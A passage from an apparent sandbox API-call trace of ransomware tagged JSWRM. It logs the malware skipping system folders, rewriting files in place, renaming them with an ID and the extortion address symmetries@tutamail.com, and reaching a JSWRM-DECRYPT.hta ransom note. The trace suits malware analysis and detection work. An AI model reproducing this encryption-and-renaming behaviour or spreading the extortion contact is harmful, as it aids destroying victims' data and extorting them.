lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0060.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqNotMet.ico", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SysReqNotMet.ico", lpUsedDefaultChar=0x0) returned 16 [0060.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqNotMet.ico", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0060.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SysReqNotMet.ico", cchWideChar=16, lpMultiByteStr=0x2413a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SysReqNotMet.ico", lpUsedDefaultChar=0x0) returned 16 [0060.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0060.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.609] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.609] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=1150) returned 1 [0060.609] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x203550 [0060.609] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x470, lpOverlapped=0x0) returned 1 [0060.610] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.610] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x470, lpOverlapped=0x0) returned 1 [0060.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.611] CloseHandle (hObject=0x3d4) returned 1 [0060.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0060.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0060.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0060.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0060.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0060.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.612] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0060.612] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2=".") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="..") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="...") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="windows") returned -1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="recovery") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="perflogs") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="documents and settings") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.612] lstrcmpiW (lpString1="warn.ico", lpString2="system volume information") returned 1 [0060.613] lstrcmpiW (lpString1="warn.ico", lpString2="msocache") returned 1 [0060.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0060.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="warn.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="warn.ico", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="warn.ico", lpUsedDefaultChar=0x0) returned 8 [0060.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0060.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="warn.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="warn.ico", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="warn.ico", lpUsedDefaultChar=0x0) returned 8 [0060.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0060.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0060.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0060.613] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.613] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=10134) returned 1 [0060.613] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2790) returned 0x23dc88 [0060.613] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x2790, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x2790, lpOverlapped=0x0) returned 1 [0060.615] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.615] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x2790, lpOverlapped=0x0) returned 1 [0060.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0060.615] CloseHandle (hObject=0x3d4) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0060.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0060.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0060.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.616] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0060.617] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0060.617] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.617] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2=".") returned 1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="..") returned 1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="...") returned 1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="windows") returned -1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="recovery") returned -1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="perflogs") returned -1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="documents and settings") returned 1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="$RECYCLE.BIN") returned 1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="system volume information") returned -1 [0060.617] lstrcmpiW (lpString1="header.bmp", lpString2="msocache") returned -1 [0060.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="header.bmp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="header.bmp", cchWideChar=10, lpMultiByteStr=0x345f978, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="header.bmp", lpUsedDefaultChar=0x0) returned 10 [0060.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0060.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="header.bmp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="header.bmp", cchWideChar=10, lpMultiByteStr=0x345f948, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="header.bmp", lpUsedDefaultChar=0x0) returned 10 [0060.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0060.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0060.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0060.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.618] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=3628) returned 1 [0060.618] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe20) returned 0x23cc80 [0060.619] ReadFile (in: hFile=0x450, lpBuffer=0x23cc80, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x23cc80*, lpNumberOfBytesRead=0x345f63c*=0xe20, lpOverlapped=0x0) returned 1 [0060.620] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.620] WriteFile (in: hFile=0x450, lpBuffer=0x23cc80*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x23cc80*, lpNumberOfBytesWritten=0x345f638*=0xe20, lpOverlapped=0x0) returned 1 [0060.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.620] CloseHandle (hObject=0x450) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0060.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0060.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226630 [0060.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0060.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226630 | out: hHeap=0x1e0000) returned 1 [0060.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.621] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), lpNewFileName="C:\\588bce7c90097ed212\\header.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\header.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0060.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0060.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0060.622] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1991a791, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1991a791, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1991a791, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.622] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0060.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 